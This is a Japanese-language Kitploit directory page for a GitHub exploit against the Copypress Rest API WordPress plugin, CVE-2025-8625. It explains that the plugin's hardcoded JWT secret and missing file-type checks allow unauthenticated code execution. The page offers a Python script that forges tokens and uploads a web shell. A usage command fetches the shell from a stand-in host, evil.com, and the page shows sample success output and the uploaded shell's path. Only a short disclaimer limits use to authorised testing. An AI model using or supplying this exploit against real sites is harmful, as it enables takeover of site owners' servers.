Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8625 — Copypress Rest API 1.1 - 1.2 - 設定可能なJWTシークレットとファイルタイプ検証の欠如による未認証のリモートコード実行 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-8625
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubnxploited/cve-2025-8625

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - 設定可能なJWTシークレットとファイルタイプ検証の欠如による未認証のリモートコード実行

リポジトリを見る
210ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - 設定可能なJWTシークレットとファイルタイプ検証の欠如による、認証されていないリモートコード実行

🛡️ Copypress Rest API 1.1 - 1.2 RCE エクスプロイト

📝 説明

WordPress用Copypress Rest APIプラグイン(バージョン1.1から1.2)は、copyreap_handle_image() 関数を介したリモートコード実行に対して脆弱です。
このプラグインは、シークレットが設定されていない場合にハードコードされたJWT署名キーを使用し、ファイルタイプを検証しないため、認証されていない攻撃者がトークンを偽造し、イメージハンドラエンドポイントを通じて任意のファイル(PHPシェルなど)をアップロードできます。

  • CVE: CVE-2025-8625
  • CVSS: 9.8 (緊急)

🚀 スクリプト概要

スクリプト名: CVE-2025-8625.py
このPythonスクリプトは、脆弱性の悪用を自動化し、有効なJWTを生成して巧妙に細工されたリクエストを送信し、悪意のあるファイル(ウェブシェル)を脆弱なWordPressサイトにアップロードできます。


⚙️ 使用方法

root@kitploit:~
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
  • -u / --url: 対象のWordPressサイトのURL
  • -shell / --shell: ウェブシェルまたは悪意のあるPHPファイルへの直接リンク

出力例:

root@kitploit:~
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.

🏆 特徴

  • プラグインのハードコードされたシークレットを使用して有効なJWTを生成
  • 認証をバイパスして任意のファイルをアップロード
  • 悪用の成功/失敗を明確に出力
  • シンプルなコマンドラインインターフェース

📂 シェルアップロード場所

シェルのアップロードに成功しました! 🎉
シェルのパス例:

root@kitploit:~
https://target.com/wp-content/uploads/2025/10/shell.php

⚠️ 免責事項

このツールは教育および許可されたペネトレーションテストの目的にのみ使用してください。
明示的な許可なしにターゲットに対して使用することは違法です。


作成者: Nxploited (Khaled Alenazi)

ツールをダウンロード